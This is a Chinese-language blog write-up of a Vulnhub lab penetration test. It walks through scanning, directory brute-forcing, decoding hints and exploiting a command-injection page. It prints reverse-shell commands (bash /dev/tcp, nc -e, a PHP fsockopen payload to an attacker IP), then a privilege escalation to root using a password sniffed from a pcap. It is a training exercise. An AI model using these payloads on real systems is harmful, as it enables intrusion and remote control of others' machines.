2018-09-14-Vulnhub渗透测试实战writeup(1)

首先整理一下整条渗透测试的思路

信息收集,可以分为四方面

第一点主要是域名的whois信息,获取注册人的邮箱,电话等等

第二点主要是DNS信息,traceroute信息,nslookup可以收集dns的这些信息内容,或者dig也行.

第三点主要是Google hacking,利用一些语法来搜索相关站点的信息,例如site: sina.com,例如inurl:sina.cn等等

第四点主要来自端口扫描,目录扫描等,例如利用nmap扫描端口的信息,利用dirbuster爆破目录等,收集目标的端口信息以及目标的隐藏目录等等.

因此首先我们对目标进行信息收集,由于是自己搭建的环境,运行在vm上面,所以没有对应域名,whois查询以及DNS信息查询就不需要了,然后就是Google hacking的信息也是找不到什么的,所以直接上nmap以及dirbuster试试.

<code>
sudo map -p 1-65535 -sV -oN 10.10.10.139.xml 10.10.10.139

</code>
然后如果nmap启动了全端口扫描的话,扫描就会变得很慢,目前看来没啥好的解决方法,我看他们都是使用 -T4设置线程来提高速度而已.这里让我们等一下....
好吧,接着我把结果贴出来一下,nmap扫描的结果如下:
<code>

Nmap 7.40 scan initiated Fri Sep 14 12:03:15 2018 as: nmap -p 1-65535 -sV -oN 10.10.10.139.xml 10.10.10.139

Nmap scan report for 10.10.10.139
Host is up (0.0019s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:0B:66:96 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done at Fri Sep 14 12:03:50 2018 -- 1 IP address (1 host up) scanned in 34.32 seconds

</code>
这样的话我们就可以得到信息,该机器在33447端口上面开放了33447端口,运行着apache
httpd 服务,并且运行在ubuntu上面.
这里直接上CVE官网直接找该版本Apache 漏洞,看看有没有.贴一下CVE的结果如下:


图1

可以看到下面的都是2.4.10之前版本的漏洞,跟2.4.10相关的只有前两个,第二个根据描述是拒绝服务的,这里就不探索该漏洞了,毕竟是要冲着getshell去的男人.[手动Dog脸]
然后就是上cnnvd直接看一下第一个漏洞描述,如下:


图2

可以发现这是一个绕过权限访问限制漏洞,但是没告诉我们是绕过哪些限制以及exp,那就上exploit-db.com搜一下,But nothing to found....so, this way is blocked.

然后先说一下kali里面字典的地址,常用字典的位置在/root/usr/share/wordlists下面
在kali里面输入dirbuster -u url就可以启动owasp dirbuster,如下:


图3

然后坐等目录爆破结果.爆破的时间实在是太久了,所以先看看别的方面吧.

B:漏洞挖掘
漏洞挖掘的话,就是直接先上扫描器,注意要借助代理,但是这个没啥技术含量,这里就不演示了.
然后是直接访问页面,很自然打开F12查看源代码,如下:

图4

可以看到右边有一串莫名奇妙的16进制字符串,直接上https://www.sojson.com转换,如下:
d293LmpwZw==这是其对应的ascii码,然后就是这里后面的==让我联想到所谓的base64编码的补全,然后嗒然发现原来base64可以不是32或者64位的,反正解码出来就是wow.jpg,
看到这里我想起那个dirbuster刚好扫出了images的状态码为403的目录,直接试一下可以看到
图5

被嘲讽了一波...看到这里我想起图片隐写,直接扔binwalk分析一波.但是没发现啥,说明这图片纯粹是嘲讽一波(怎么可能),所以直接用gedit打开一下看看,结果在图片编码尾巴发现一串字符串:37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34,看到这个莫名熟悉,想起好像以前ctf好像做过这个,直接扔python里面,调用replace方法将":"给替换成无符号,那就得到一大串字符串,不出意外一般就是16进制编码了,毕竟16进制是最随意的,没啥特定格式,所以直接扔16进制解码如下:
7aee0f6d588ed9905ee37f16a7c610d4,这模样很想md5,所以直接拿cmd5试下,可以解码如下:
图6

63425.....代表毛线???唔知道系咩啊~只能等后边慢慢试下喽.
然后到这一步就没得做了,只能等目录爆破结果的信息,毕竟漏扫以及nmap扫描都没啥好的发现,然后可以发现扫结果如下:
图7

二级目录展示如下所示:
图8

这里可以按照他的目录打开他的includes/functions.php等各个文件,会发现functions.php是空的,查看过F12也是这个结果,然后index.php是一个登录界面,如下:
图9

然后可以发现是一个登录界面,使用post方法,用sha512做了密码的哈希,然后
这里的想法是可以尝试爆破以及注入,但是没啥资料可以生成特定字典,注入的话只能试试那个登录邮箱名,尝试以后发现没啥注入点.

所以先看看别的页面,其他扫出来结果如下所示:


图10

这里有几个可以看看的目录,分别是cake.php,include.php,hacked.php,下面分别看看这几个页面,首先是cake.php,如下:
cake.php打开以后就是一个简单的静态页面,直接上f12看下,如下:


图11

可以看到title里面有一个/Magic_Box,推测是目录名称,因此可能可以直接往/Challenge/Magic_Box里面再爆破一波,先扔dirbuster里面试下.
然后是hacked.php,发现打开是一个输入id的页面,然后直接输入63425(前面的数字,啥都没发生)
图12

然后就是include.php,打开发现是一个文件包含页面,然后没回显,试下


图13

发现隐藏在源码里面了,然后就是试下远程文件包含,发现无法包含,那只能用于看下敏感文件,然后源码里面发现一串16进制0x5933566a4c6e4a34626e413d,16转字符串,再转换base32后如右:cuc.rxnp,google后没发现没有价值的信息,所以又是个没用的信息.

然后回dirbuster看爆破结果


图14

发现该目录下有几个文件,command.php,low.php.low.php没发现啥内容,最后那个是跳转到登录界面的.
看command.php,这个存在命令注入漏洞,可以直接注入系统命令.


图15

既然存在命令注入,那就可以好好利用了.

存在命令注入,那就可以进行shell反弹尝试,可以试一波.
先在自己终端开启nc -l 4567,然后直接上那个bash shell反弹,命令如下:
bash -i >& /dev/tcp/192.168.64.1/4567 0>&1结果失败了
接着试下netcat反弹shell,命令如下:
nc -e /bin/bash -d 192.168.64.1 4567,结果也失败了,
因为目标是php环境,可以试下php反弹shell,如下
php -r 'sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 构成命令注入payload:127.0.0.1&&php -r 'sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

图16

图17

可以看到反弹成功(这里发现反弹shell的姿势水很深,找时间一起整理一下!!!)
拿到shell就是尝试提权操作,发现失败,回显说:su: must be run from a terminal
这里用到一个提权的技巧,可以使用python来调用本地shell,把bash路径写入到python文件里面,然后直接运行py文件就可以了.命令如下:
图18

这里说一下,pty是用来处理伪终端命令的操作模块,spawn是用来产生一个进程,并将其控制终端与当前进程的标准io连接.

接下插卡看一下那个cat /etc/passwd文件,文件里面第一列是有关一些用户名,因此直接整理看了一下有三个要注意的用户,root,acid,saman,然后看一下acid用户,直接find命令找一下该用户相关的文件,命令如下:
find / -user acid 2>/dev/null


图19

可以看到给了我们一个提示的pcapng流量文件,直接scp过来后打开流量文件,跟踪tcp流量流,发现saman的密码直接明文传输了.


图20

密码是1337hax0r,那就可以直接su了.
图21

提权了以后再直接升到sudo su root权限,密码同样
图22

然后就是直接使用find命令,查找其中的flag.txt,这条命令可以学起来:
find / -name flag.txt,如下:


图23

至此结束.
整理一下思路:
1.首先是自己靶机,没得做信息收集,所以直接上nmap和dirbuster,nmap扫描出来的结果没啥好用的,dirbuster暴露出来一些目录
2.在爆破粗来的一级目录下有一些页面,点进去查看源代码有一些彩蛋,
3.根据其中一个暴露出来的页面提示,进行二次目录爆破.
4.得到命令注入漏洞以后,直接根据命令注入漏洞写shell,可以尝试bash shell,netcat shell,不行就直接php写shell,各种语言都有对应的写shell的方法.
5.获得shell以后,使用python pty模块获得终端,然后查看有哪些用户.
6.根据用户相关文件查看,获得提示流量文件
7.根据流量文件获取登录密码,直接提升到root权限.
8.使用find命令查找文件,获得flag.txt

What I learn most in this practice is dirbuster, it's real useful.

最后靶机下载连接为:https://pan.baidu.com/s/1iLFMXW6G2sByyQL4H577VQ
参考连接:https://www.anquanke.com/post/id/105462

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,732评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,496评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,264评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,807评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,806评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,675评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,029评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,683评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,704评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,666评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,773评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,413评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,016评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,204评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,083评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,503评论 2 343

推荐阅读更多精彩内容